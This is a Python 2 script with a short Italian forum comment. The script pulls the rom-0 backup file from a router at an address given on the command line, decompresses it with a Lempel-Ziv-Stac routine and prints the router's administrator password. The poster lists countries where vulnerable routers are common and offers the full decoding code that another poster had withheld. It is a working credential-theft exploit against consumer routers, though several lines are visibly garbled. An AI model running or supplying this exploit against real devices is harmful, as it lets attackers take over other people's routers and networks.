import os import sys from struct import * import urllib2 ############################################################## # Lempel-Ziv-Stac decompression # BitReader and RingList classes # # Copyright (C) 2011 Filippo Valsorda - FiloSottile # - # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <>. # ############################################################## import collections class BitReader: """ Gets a string or a iterable of chars (also mmap) representing bytes (ord) and permits to extract bits one by one like a stream """ def __init__(self, bytes): self._bits = collections.deque() for byte in bytes: byte = ord(byte) for n in xrange(8): self._bits.append(bool((byte >> (7-n)) & 1)) def getBit(self): return self._bits.popleft() def getBits(self, num): res = 0 for i in xrange(num): res += self.getBit() << num-1-i return res def getByte(self): return self.getBits(8) def __len__(self): return len(self._bits) class RingList: """ When the list is full, for every item appended the older is removed """ def __init__(self, length): self.__data__ = collections.deque() self.__full__ = False self.__max__ = length def append(self, x): if self.__full__: self.__data__.popleft() self.__data__.append(x) if self.size() == self.__max__: self.__full__ = True def get(self): return self.__data__ def size(self): return len(self.__data__) def maxsize(self): return self.__max__ def __getitem__(self, n): if n >= self.size(): return None return self.__data__[n] def LZSDecompress(data, window = RingList(2048)): """ Gets a string or a iterable of chars (also mmap) representing bytes (ord) and an optional pre-populated dictionary; return the decompressed string and the final dictionary """ reader = BitReader(data) result = '' while True: bit = reader.getBit() if not bit: char = reader.getByte() result += chr(char) window.append(char) else: bit = reader.getBit() if bit: offset = reader.getBits(7) if offset == 0: # EOF break else: offset = reader.getBits(11) lenField = reader.getBits(2) if lenField < 3: lenght = lenField + 2 else: lenField <<= 2 lenField += reader.getBits(2) if lenField < 15: lenght = (lenField & 0x0f) + 5 else: lenCounter = 0 lenField = reader.getBits(4) while lenField == 15: lenField = reader.getBits(4) lenCounter += 1 lenght = 15*lenCounter + 8 + lenField for i in xrange(lenght): char = window[-offset] result += chr(char) window.append(char) return result, window class Object: def __init__(self,blockdata,data): = data[:14].strip("\x00") self.uncompsize = unpack(">H",data[14:16])[0] self.compsize = unpack(">H",data[16:18])[0] self.offset = unpack(">H",data[18:20])[0] print "Object", ,self.uncompsize,self.compsize,self.offset = blockdata[self.offset:self.offset+self.compsize] #print [] if == "spt.dat": data2 = = "" index = 12 while index < self.uncompsize: orgsize = unpack(">H",data2[index:index+2])[0] rawsize = unpack(">H",data2[index+2:index+4])[0] #print orgsize,rawsize += LZSDecompress(data2[index+4:index+4+rawsize])[0] index += rawsize print "Password:",[20:].split("\x00")[0] class Block: def __init__(self,data): self.blocknumber = ord(data[0]) self.unk1 = ord(data[1]) self.objectcount = unpack(">H",data[2:4])[0] self.blocklength = unpack(">H",data[4:6])[0] print "Block:",self.blocknumber , self.objectcount , self.blocklength self.objects = [] for i in range(0,self.objectcount): self.objects.append(Object(data,data[6+20*i:])) blocks = [] f = urllib2.urlopen("http://%s/rom-0"%sys.argv[1]) # = open(sys.argv[1],"rb") d = mem = Block(d[0x0:]) a = Block(d[0x2000:])
Le nazioni che principalmente hanno questi router vulnerabili sono Romania, Algeria, Egitto, Colombia, Brasile, Albania.
Per favore comunque evitate di farci danni con questo script, è un exploit vecchio di circa 1 anno e mezzo che trovai in seguito ad un attacco DDoS subito su un server privato di world of warcraft , e che nonostante abbia segnalato agli ISP è stato del tutto ignorato.
Lo posto solo ora perché ho visto che ci ha già pensato un altro a scoperchiare il vaso di pandora , solo che ha fatto il furbo , ed ha nascosto tutta la parte per decodificare il file rom-0 che io includo invece qui